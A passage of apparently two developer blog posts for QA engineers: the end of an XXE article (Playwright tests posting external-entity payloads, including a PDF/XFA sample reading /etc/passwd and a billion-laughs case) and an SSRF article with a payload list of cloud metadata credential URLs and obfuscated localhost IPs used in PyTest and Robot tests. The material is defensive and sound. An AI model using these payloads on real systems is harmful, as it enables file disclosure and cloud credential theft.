class="nx">name</span><span class="p">,</span> <span class="nx">payload</span><span class="p">]</span> <span class="k">of</span> <span class="nb">Object</span><span class="p">.</span><span class="nf">entries</span><span class="p">(</span><span class="nx">XXE_PAYLOADS</span><span class="p">))</span> <span class="p">{</span> <span class="nf">test</span><span class="p">(</span><span class="s2">`XXE — </span><span class="p">${</span><span class="nx">name</span><span class="p">}</span><span class="s2"> payload rejected`</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// CVE-2025-66516: external entity resolution must be disabled</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/parse-xml</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="nx">payload</span><span class="p">,</span> <span class="na">headers</span><span class="p">:</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">application/xml</span><span class="dl">'</span> <span class="p">},</span> <span class="p">});</span> <span class="nf">expect</span><span class="p">(</span> <span class="p">[</span><span class="mi">400</span><span class="p">,</span> <span class="mi">403</span><span class="p">,</span> <span class="mi">422</span><span class="p">],</span> <span class="s2">`XXE payload '</span><span class="p">${</span><span class="nx">name</span><span class="p">}</span><span class="s2">' not rejected — returned </span><span class="p">${</span><span class="nx">response</span><span class="p">.</span><span class="nf">status</span><span class="p">()}</span><span class="s2">`</span> <span class="p">).</span><span class="nf">toContain</span><span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nf">status</span><span class="p">());</span> <span class="p">});</span> <span class="nf">test</span><span class="p">(</span><span class="s2">`XXE — </span><span class="p">${</span><span class="nx">name</span><span class="p">}</span><span class="s2"> produces no file system content`</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/parse-xml</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="nx">payload</span><span class="p">,</span> <span class="na">headers</span><span class="p">:</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">application/xml</span><span class="dl">'</span> <span class="p">},</span> <span class="p">});</span> <span class="kd">const</span> <span class="nx">body</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">response</span><span class="p">.</span><span class="nf">text</span><span class="p">();</span> <span class="k">for </span><span class="p">(</span><span class="kd">const</span> <span class="nx">marker</span> <span class="k">of</span> <span class="nx">FILE_SYSTEM_MARKERS</span><span class="p">)</span> <span class="p">{</span> <span class="nf">expect</span><span class="p">(</span> <span class="nx">body</span><span class="p">,</span> <span class="s2">`File system content '</span><span class="p">${</span><span class="nx">marker</span><span class="p">}</span><span class="s2">' found in response for '</span><span class="p">${</span><span class="nx">name</span><span class="p">}</span><span class="s2">'`</span> <span class="p">).</span><span class="nx">not</span><span class="p">.</span><span class="nf">toContain</span><span class="p">(</span><span class="nx">marker</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> <span class="p">}</span> <span class="nf">test</span><span class="p">(</span><span class="dl">'</span><span class="s1">XXE — PDF with XFA payload does not expose file content</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// CVE-2025-66516 exact attack surface: XFA inside PDF triggers tika-core XXE</span> <span class="kd">const</span> <span class="nx">xfaPayload</span> <span class="o">=</span> <span class="nx">Buffer</span><span class="p">.</span><span class="k">from</span><span class="p">(</span><span class="s2">`%PDF-1.4 1 0 obj &lt;&lt; /Type /Catalog /AcroForm &lt;&lt; /XFA 2 0 R &gt;&gt; &gt;&gt; endobj 2 0 obj &lt;&lt; /Length 180 &gt;&gt; stream &lt;?xml version="1.0"?&gt; &lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt; ]&gt; &lt;xfa:data xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"&gt; &lt;d&gt;&amp;xxe;&lt;/d&gt; &lt;/xfa:data&gt; endstream endobj trailer &lt;&lt; /Root 1 0 R &gt;&gt; %%EOF`</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/upload-document</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">multipart</span><span class="p">:</span> <span class="p">{</span> <span class="na">file</span><span class="p">:</span> <span class="p">{</span> <span class="na">name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">test.pdf</span><span class="dl">'</span><span class="p">,</span> <span class="na">mimeType</span><span class="p">:</span> <span class="dl">'</span><span class="s1">application/pdf</span><span class="dl">'</span><span class="p">,</span> <span class="na">buffer</span><span class="p">:</span> <span class="nx">xfaPayload</span><span class="p">,</span> <span class="p">},</span> <span class="p">},</span> <span class="p">});</span> <span class="kd">const</span> <span class="nx">body</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">response</span><span class="p">.</span><span class="nf">text</span><span class="p">();</span> <span class="k">for </span><span class="p">(</span><span class="kd">const</span> <span class="nx">marker</span> <span class="k">of</span> <span class="nx">FILE_SYSTEM_MARKERS</span><span class="p">)</span> <span class="p">{</span> <span class="nf">expect</span><span class="p">(</span> <span class="nx">body</span><span class="p">,</span> <span class="s2">`File system content '</span><span class="p">${</span><span class="nx">marker</span><span class="p">}</span><span class="s2">' found in PDF/XFA XXE response`</span> <span class="p">).</span><span class="nx">not</span><span class="p">.</span><span class="nf">toContain</span><span class="p">(</span><span class="nx">marker</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> <span class="nf">test</span><span class="p">(</span><span class="dl">'</span><span class="s1">XXE — billion laughs does not cause timeout</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// entity expansion attack — parser must reject before memory exhaustion</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/parse-xml</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="nx">XXE_PAYLOADS</span><span class="p">.</span><span class="nx">billionLaughs</span><span class="p">,</span> <span class="na">headers</span><span class="p">:</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">application/xml</span><span class="dl">'</span> <span class="p">},</span> <span class="na">timeout</span><span class="p">:</span> <span class="mi">10000</span><span class="p">,</span> <span class="p">});</span> <span class="nf">expect</span><span class="p">(</span> <span class="p">[</span><span class="mi">400</span><span class="p">,</span> <span class="mi">403</span><span class="p">,</span> <span class="mi">422</span><span class="p">],</span> <span class="dl">'</span><span class="s1">Billion laughs payload not rejected — possible DoS risk</span><span class="dl">'</span> <span class="p">).</span><span class="nf">toContain</span><span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nf">status</span><span class="p">());</span> <span class="p">});</span> <span class="nf">test</span><span class="p">(</span><span class="dl">'</span><span class="s1">XXE — valid XML still parses correctly</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// confirm protection does not break legitimate XML processing</span> <span class="kd">const</span> <span class="nx">validXml</span> <span class="o">=</span> <span class="s2">`&lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;config&gt; &lt;setting name="timeout"&gt;30&lt;/setting&gt; &lt;setting name="retries"&gt;3&lt;/setting&gt; &lt;/config&gt;`</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/parse-xml</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="nx">validXml</span><span class="p">,</span> <span class="na">headers</span><span class="p">:</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">application/xml</span><span class="dl">'</span> <span class="p">},</span> <span class="p">});</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nf">status</span><span class="p">()).</span><span class="nf">toBe</span><span class="p">(</span><span class="mi">200</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <p>Run XXE tests in isolation:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">npx playwright test --grep "XXE" </span></code></pre> </div> <h3> CI/CD gate </h3> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">xxe-security-tests</span><span class="pi">:</span> <span class="na">stage</span><span class="pi">:</span> <span class="s">test</span> <span class="na">script</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">pytest tests/security/test_xxe.py -v</span> <span class="pi">-</span> <span class="s">npx playwright test --grep "XXE"</span> <span class="na">rules</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">if</span><span class="pi">:</span> <span class="s1">'</span><span class="s">$CI_PIPELINE_SOURCE</span><span class="nv"> </span><span class="s">==</span><span class="nv"> </span><span class="s">"merge_request_event"'</span> <span class="na">allow_failure</span><span class="pi">:</span> <span class="kc">false</span> </code></pre> </div> <p>Pair with a Semgrep rule that flags XML parser instantiation without external entity disabling configuration applied. The static check catches new parser instantiations before deployment. The runtime tests confirm the configuration is actually in effect in the running application.</p> <h3> Environment note </h3> <p>XXE behavior changes between environments because file system content differs and because some server configurations restrict which files the process can read. In a Docker container running as a non-root user, the payload may resolve successfully but return empty content, which your test could incorrectly interpret as passing.</p> <p>Assert on the absence of the error that would indicate resolution was blocked, not just on the absence of file content. Also test in your staging environment with the same XML parser versions your production Docker images contain. Parser versions within the same major version can have different default configurations depending on the distribution and build flags.</p> <p>Practice this yourself: <a href="https://yuriysafron.com/qa-sandbox/xxe/" rel="noopener noreferrer">https://yuriysafron.com/qa-sandbox/xxe/</a></p> <h2> Why AI fails here </h2> <p>When a team asks GitHub Copilot to write tests for an XML processing endpoint, it generates tests that submit valid XML documents and assert that the parsed output is correct. The schema validates. The content is extracted. The response matches expectations.</p> <p>Not one generated test contains a DOCTYPE declaration. Not one submits an entity reference.</p> <p>The structural reason LLMs fail at XXE: the vulnerability is defined by a parser feature, not by application logic. To test for it, you need to know that XML parsers have external entity resolution, that this feature is enabled by default, that it is triggered by a DOCTYPE declaration in the input, and that the correct test submits that declaration and checks what the server does. This knowledge does not come from reading the application code. It comes from understanding the XML specification and the history of parser misconfigurations.</p> <p>The concrete failure: a QA team builds an API that accepts XML configuration files for batch import. Copilot generates fifteen tests. Every test submits a valid configuration file. Every test passes. Three months later, a penetration tester submits a configuration file whose first line defines an external entity pointing to the application's environment file. The response body contains the database connection string. The Copilot suite had fifteen tests for the XML endpoint. None contained a DOCTYPE. The XXE surface had been there since day one.</p> <h2> How to prevent </h2> <p><strong>1. Explicit external entity disabling in every parser instantiation</strong> — in Java, set the features <code>http://xml.org/sax/features/external-general-entities</code> and <code>http://xml.org/sax/features/external-parameter-entities</code> to false, and disable DOCTYPE declarations entirely with <code>http://apache.org/xml/features/disallow-doctype-decl</code> set to true. In Python, use <code>defusedxml</code> as a drop-in replacement for the standard library's <code>xml</code> module. Use a hardened shared parser factory so individual developers cannot instantiate a default parser without the configuration applied.</p> <p><strong>2. Parser version audit in your dependency pipeline</strong> — the Apache Tika CVE-2025-66516 case demonstrated that partial upgrades leave organizations vulnerable when the fix resides in a shared core module. Every dependency that processes XML-based formats, including libraries handling PDF, DOCX, XLSX, SVG, RSS, and SOAP, must be included in your dependency audit. Tools like GitHub Dependabot, Snyk, or OWASP Dependency-Check integrated into GitLab CI surface vulnerable transitive dependencies before they reach production.</p> <p><strong>3. Content-type and format enforcement before parsing</strong> — reject any request whose content does not match the expected format before passing it to the parser. This eliminates a large class of direct XML injection attacks where an attacker submits a raw XML payload to an endpoint that expects a binary format.</p> <p>Prevention only works when your test suite actively verifies that external entity resolution is disabled under adversarial payloads. A parser configured correctly in code can have its configuration overridden by a library update, a framework default, or a developer who does not understand why the configuration exists. The XXE payload tests are the enforcement mechanism.</p> <h2> Conclusion </h2> <p>Working on a cybersecurity platform protecting U.S. critical infrastructure and multiple branches of the U.S. military gives you a direct view of what document parsing vulnerabilities mean at scale. In those environments, a file upload endpoint that processes XML is not a minor feature. It is a potential entry point into internal network infrastructure.</p> <p>XXE sits in the category of vulnerabilities that are entirely invisible to functional test coverage and entirely obvious once you know what payload to submit.</p> <p>The gap between "this endpoint parses XML correctly" and "this endpoint refuses to resolve external entities" is a single parser configuration line. The test suite is the only thing that tells you whether that line is there.</p> <p>When did your team last verify that every XML parser in your codebase has external entity resolution explicitly disabled — and do you have a test that would catch a new parser instantiation that ships without that configuration?</p> <p>Part of the Break It on Purpose series — published weekly for QA<br> engineers and SDETs who find bugs before attackers do.</p> <p>Practice sandbox: yuriysafron.com/qa-sandbox<br> LinkedIn: linkedin.com/in/yuriysafronnynov</p> security python web testing Yuriy Safronnynov Mon, 04 May 2026 01:15:00 +0000 https://forem.com/ysafron/server-side-request-forgery-ssrf-ede https://forem.com/ysafron/server-side-request-forgery-ssrf-ede <p>Your application fetches a URL. The user supplied it. Your server makes the request, follows the redirect, and returns the content.</p> <p>The URL pointed to <a href="http://169.254.169.254/latest/metadata/iam/security-credentials/production-role" rel="noopener noreferrer">http://169.254.169.254/latest/metadata/iam/security-credentials/production-role</a>.</p> <p>Your application just handed the attacker your cloud credentials.</p> <h2> TL;DR </h2> <ul> <li>SSRF lets an attacker trick your server into making requests on their behalf — to internal services, cloud metadata endpoints, or infrastructure never meant to be reachable from the outside.</li> <li>CVE-2024-29415 in the npm <code>ip</code> package allowed attackers to bypass SSRF protections using non-standard IP representations that <code>isPublic()</code> incorrectly classified as safe. CVSS 8.1 High.</li> <li>Your suite almost certainly validates that your URL-fetchin feature works. It does not validate that it refuses to fetch <code>http://169.254.169.254/latest/meta-data/</code> or <code>http://127.1/admin</code>.</li> <li>Fix requires an allowlist of permitted destinations, not a blocklist. Blocklists fail because IP representations are infinite. Allowlists fail only if you misconfigure them.</li> <li>AI-generated tests submit valid URLs and assert correct responses. They never submit internal service addresses. The SSRF surface stays untouched.</li> </ul> <h2> What it is </h2> <p>Server-Side Request Forgery (CWE-918, OWASP A10:2021) occurs when an application fetches a remote resource based on a URL supplied by the user without sufficiently validating that the destination is permitted.</p> <p>The server makes the request with its own credentials and network position. In cloud environments, this means access to the instance metadata service, internal VPC services, Kubernetes API servers, Redis instances — any resource reachable from the server's network context but not from the public internet.</p> <p>The attacker's HTTP request never touches those services directly. The server makes the request for them.</p> <p>Developers introduce SSRF when building legitimately useful features: URL preview generation, webhook delivery, import from external URLs, image fetching from user-supplied sources. A developer adds a check to ensure the target is not a private IP address. The check uses a library function. The library function has edge cases the developer never tested. The feature ships, all happy-path tests pass, and the SSRF surface exists silently in production.</p> <p>What makes SSRF particularly dangerous in cloud and microservices environments is the blast radius. A single vulnerability in one service can expose credentials for the entire cloud account, enable lateral movement to internal APIs, allow enumeration of the internal network topology, and provide an unauthenticated entry point to services that assume they are only reachable from trusted internal callers.</p> <h2> Real world damage </h2> <p><strong>CVE-2024-29415 · npm <code>ip</code> package · May 2024 · CVSS 8.1 (High)</strong></p> <p>In May 2024, an SSRF vulnerability was published for the <code>ip</code> npm package — a widely used Node.js library for IP address manipulation and validation. The <code>isPublic()</code> function, intended to identify whether an IP address is globally routable, incorrectly classified several non-standard representations as public when they actually resolved to loopback or private addresses.</p> <p>Representations including <code>127.1</code>, <code>01200034567</code>, <code>012.1.2.3</code>, <code>000:0:0000::01</code>, and <code>::fFFf:127.0.0.1</code> all passed the <code>isPublic()</code> check — meaning applications relying on this function to block SSRF requests would silently allow connections to localhost and private network services.</p> <blockquote> <p>Source: GitHub Advisory GHSA-2p57-rm9w-gvfp and NVD CVE-2024-29415 (nvd.nist.gov/vuln/detail/CVE-2024-29415). Affected versions: <code>ip</code> through 2.0.1.</p> </blockquote> <p>In a cloud environment, a request to <code>http://127.1/latest/meta data/</code> on an AWS EC2 instance routes to the same metadata service as <code>http://169.254.169.254/latest/meta-data/</code> — potentially exposing IAM credentials. A QA engineer running SSRF payload tests with non-standard IP representations would have caught this. No such tests existed in the pipelines of applications that trusted the <code>ip</code> package for SSRF protection.</p> <h2> The invisible bug problem </h2> <p>Test suites for URL-fetching features test that the feature fetches URLs correctly. They submit a valid external URL, assert a 200 response, and check that content was returned as expected.</p> <p>Nobody submits <code>http://127.0.0.1/admin</code>, <code>http://169.254.169.254/latest/meta-data/</code>, or <code>http://127.1/config</code>.</p> <p>The SSRF protection layer is never exercised because all test inputs are exactly what the protection was never designed to reject. The happy path never touches the validation logic from the adversarial direction.</p> <p>SSRF lives entirely in the space between "what valid input looks like" and "what an attacker would actually submit" — and that space is never covered by tests written by someone thinking about how the feature works rather than how it breaks.</p> <h2> How QA engineers catch it </h2> <p>The core principle: every endpoint that accepts a URL, hostname, or IP address from user input must be tested with a systematic list of SSRF payloads targeting internal and cloud metadata addresses. Not just valid external URLs. Specifically adversarial inputs designed to reach private infrastructure.</p> <h3> SSRF payload reference </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code># Cloud metadata endpoints http://169.254.169.254/latest/meta-data/ # AWS http://169.254.169.254/latest/meta-data/iam/security-credentials/ http://metadata.google.internal/computeMetadata/v1/ # GCP http://169.254.169.254/metadata/instance # Azure # Localhost variants http://127.0.0.1/ http://localhost/ http://0.0.0.0/ # Non-standard representations — bypass naive isPublic() checks http://127.1/ # CVE-2024-29415 bypass http://0x7f000001/ # hexadecimal http://2130706433/ # decimal http://012.0.0.1/ # octal # Internal network ranges http://192.168.1.1/ http://10.0.0.1/ http://172.16.0.1/ </code></pre> </div> <h3> PyTest </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">pytest</span> <span class="kn">import</span> <span class="n">requests</span> <span class="n">BASE_URL</span> <span class="o">=</span> <span class="sh">"</span><span class="s">https://your-app.com</span><span class="sh">"</span> <span class="n">SSRF_PAYLOADS</span> <span class="o">=</span> <span class="p">[</span> <span class="c1"># cloud metadata </span> <span class="sh">"</span><span class="s">http://169.254.169.254/latest/meta-data/</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">http://169.254.169.254/latest/meta-data/iam/security-credentials/</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">http://metadata.google.internal/computeMetadata/v1/</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">http://169.254.169.254/metadata/instance</span><span class="sh">"</span><span class="p">,</span> <span class="c1"># localhost variants </span> <span class="sh">"</span><span class="s">http://127.0.0.1/</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">http://localhost/</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">http://0.0.0.0/</span><span class="sh">"</span><span class="p">,</span> <span class="c1"># CVE-2024-29415 bypass patterns — non-standard representations </span> <span class="sh">"</span><span class="s">http://127.1/</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">http://0x7f000001/</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">http://2130706433/</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">http://012.0.0.1/</span><span class="sh">"</span><span class="p">,</span> <span class="c1"># internal network ranges </span> <span class="sh">"</span><span class="s">http://192.168.1.1/</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">http://10.0.0.1/</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">http://172.16.0.1/</span><span class="sh">"</span><span class="p">,</span> <span class="p">]</span> <span class="n">METADATA_MARKERS</span> <span class="o">=</span> <span class="p">[</span> <span class="sh">"</span><span class="s">ami-id</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">instance-id</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">computeMetadata</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">access_key</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">secret_access_key</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">security-credentials</span><span class="sh">"</span> <span class="p">]</span> <span class="nd">@pytest.fixture</span> <span class="k">def</span> <span class="nf">auth_session</span><span class="p">():</span> <span class="n">session</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nc">Session</span><span class="p">()</span> <span class="n">session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/login</span><span class="sh">"</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="p">{</span> <span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">testuser</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">test_password</span><span class="sh">"</span> <span class="p">})</span> <span class="k">return</span> <span class="n">session</span> <span class="nd">@pytest.mark.parametrize</span><span class="p">(</span><span class="sh">"</span><span class="s">payload</span><span class="sh">"</span><span class="p">,</span> <span class="n">SSRF_PAYLOADS</span><span class="p">)</span> <span class="k">def</span> <span class="nf">test_ssrf_payload_rejected</span><span class="p">(</span><span class="n">auth_session</span><span class="p">,</span> <span class="n">payload</span><span class="p">):</span> <span class="c1"># every internal/cloud address must be rejected — never 200 </span> <span class="n">response</span> <span class="o">=</span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/api/fetch-url</span><span class="sh">"</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">url</span><span class="sh">"</span><span class="p">:</span> <span class="n">payload</span><span class="p">}</span> <span class="p">)</span> <span class="k">assert</span> <span class="n">response</span><span class="p">.</span><span class="n">status_code</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">400</span><span class="p">,</span> <span class="mi">403</span><span class="p">,</span> <span class="mi">422</span><span class="p">],</span> <span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="s">SSRF payload not rejected: </span><span class="si">{</span><span class="n">payload</span><span class="si">}</span><span class="s"> </span><span class="sh">"</span> <span class="sa">f</span><span class="sh">"</span><span class="s">returned </span><span class="si">{</span><span class="n">response</span><span class="p">.</span><span class="n">status_code</span><span class="si">}</span><span class="sh">"</span> <span class="p">)</span> <span class="nd">@pytest.mark.parametrize</span><span class="p">(</span><span class="sh">"</span><span class="s">payload</span><span class="sh">"</span><span class="p">,</span> <span class="n">SSRF_PAYLOADS</span><span class="p">)</span> <span class="k">def</span> <span class="nf">test_ssrf_no_internal_content_in_response</span><span class="p">(</span><span class="n">auth_session</span><span class="p">,</span> <span class="n">payload</span><span class="p">):</span> <span class="c1"># even if rejected with wrong status, body must not contain metadata </span> <span class="n">response</span> <span class="o">=</span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/api/fetch-url</span><span class="sh">"</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">url</span><span class="sh">"</span><span class="p">:</span> <span class="n">payload</span><span class="p">}</span> <span class="p">)</span> <span class="n">body</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">text</span> <span class="k">for</span> <span class="n">marker</span> <span class="ow">in</span> <span class="n">METADATA_MARKERS</span><span class="p">:</span> <span class="k">assert</span> <span class="n">marker</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">body</span><span class="p">,</span> <span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Internal service content </span><span class="sh">'</span><span class="si">{</span><span class="n">marker</span><span class="si">}</span><span class="sh">'</span><span class="s"> found in response </span><span class="sh">"</span> <span class="sa">f</span><span class="sh">"</span><span class="s">for payload: </span><span class="si">{</span><span class="n">payload</span><span class="si">}</span><span class="sh">"</span> <span class="p">)</span> <span class="k">def</span> <span class="nf">test_ssrf_non_standard_ip_representations</span><span class="p">(</span><span class="n">auth_session</span><span class="p">):</span> <span class="c1"># CVE-2024-29415: isPublic() bypass via non-standard IP formats </span> <span class="n">bypass_payloads</span> <span class="o">=</span> <span class="p">[</span> <span class="sh">"</span><span class="s">http://127.1/</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">http://0x7f000001/</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">http://2130706433/</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">http://012.0.0.1/</span><span class="sh">"</span><span class="p">,</span> <span class="p">]</span> <span class="k">for</span> <span class="n">payload</span> <span class="ow">in</span> <span class="n">bypass_payloads</span><span class="p">:</span> <span class="n">response</span> <span class="o">=</span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/api/fetch-url</span><span class="sh">"</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">url</span><span class="sh">"</span><span class="p">:</span> <span class="n">payload</span><span class="p">}</span> <span class="p">)</span> <span class="k">assert</span> <span class="n">response</span><span class="p">.</span><span class="n">status_code</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">400</span><span class="p">,</span> <span class="mi">403</span><span class="p">,</span> <span class="mi">422</span><span class="p">],</span> <span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Non-standard IP bypass not blocked: </span><span class="si">{</span><span class="n">payload</span><span class="si">}</span><span class="sh">"</span> <span class="p">)</span> <span class="k">def</span> <span class="nf">test_ssrf_valid_external_url_still_works</span><span class="p">(</span><span class="n">auth_session</span><span class="p">):</span> <span class="c1"># confirm SSRF protection does not break legitimate requests </span> <span class="n">response</span> <span class="o">=</span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/api/fetch-url</span><span class="sh">"</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">url</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">https://httpbin.org/get</span><span class="sh">"</span><span class="p">}</span> <span class="p">)</span> <span class="k">assert</span> <span class="n">response</span><span class="p">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">200</span> </code></pre> </div> <h3> Robot Framework </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>*** Settings *** Library RequestsLibrary Library Collections *** Variables *** ${BASE_URL} https://your-app.com @{CLOUD_METADATA} ... http://169.254.169.254/latest/meta-data/ ... http://169.254.169.254/latest/meta-data/iam/security-credentials/ ... http://metadata.google.internal/computeMetadata/v1/ ... http://169.254.169.254/metadata/instance @{LOCALHOST_VARIANTS} ... http://127.0.0.1/ ... http://localhost/ ... http://0.0.0.0/ @{CVE_2024_29415_BYPASSES} ... http://127.1/ ... http://0x7f000001/ ... http://2130706433/ ... http://012.0.0.1/ @{INTERNAL_RANGES} ... http://192.168.1.1/ ... http://10.0.0.1/ ... http://172.16.0.1/ @{METADATA_MARKERS} ... ami-id instance-id computeMetadata ... access_key secret_access_key security-credentials *** Test Cases *** SSRF Cloud Metadata Endpoints Must Be Rejected Create Session app ${BASE_URL} FOR ${payload} IN @{CLOUD_METADATA} ${response}= POST On Session app /api/fetch-url ... json={"url": "${payload}"} expected_status=any Should Be True ${response.status_code} in [400, 403, 422] ... msg=Cloud metadata payload not rejected: ${payload} FOR ${marker} IN @{METADATA_MARKERS} Should Not Contain ${response.text} ${marker} END END SSRF Localhost Variants Must Be Rejected Create Session app ${BASE_URL} FOR ${payload} IN @{LOCALHOST_VARIANTS} ${response}= POST On Session app /api/fetch-url ... json={"url": "${payload}"} expected_status=any Should Be True ${response.status_code} in [400, 403, 422] ... msg=Localhost variant not rejected: ${payload} END SSRF CVE-2024-29415 Bypass Representations Must Be Rejected # non-standard IP formats that bypass naive isPublic() checks Create Session app ${BASE_URL} FOR ${payload} IN @{CVE_2024_29415_BYPASSES} ${response}= POST On Session app /api/fetch-url ... json={"url": "${payload}"} expected_status=any Should Be True ${response.status_code} in [400, 403, 422] ... msg=CVE-2024-29415 bypass not blocked: ${payload} END SSRF Internal Network Ranges Must Be Rejected Create Session app ${BASE_URL} FOR ${payload} IN @{INTERNAL_RANGES} ${response}= POST On Session app /api/fetch-url ... json={"url": "${payload}"} expected_status=any Should Be True ${response.status_code} in [400, 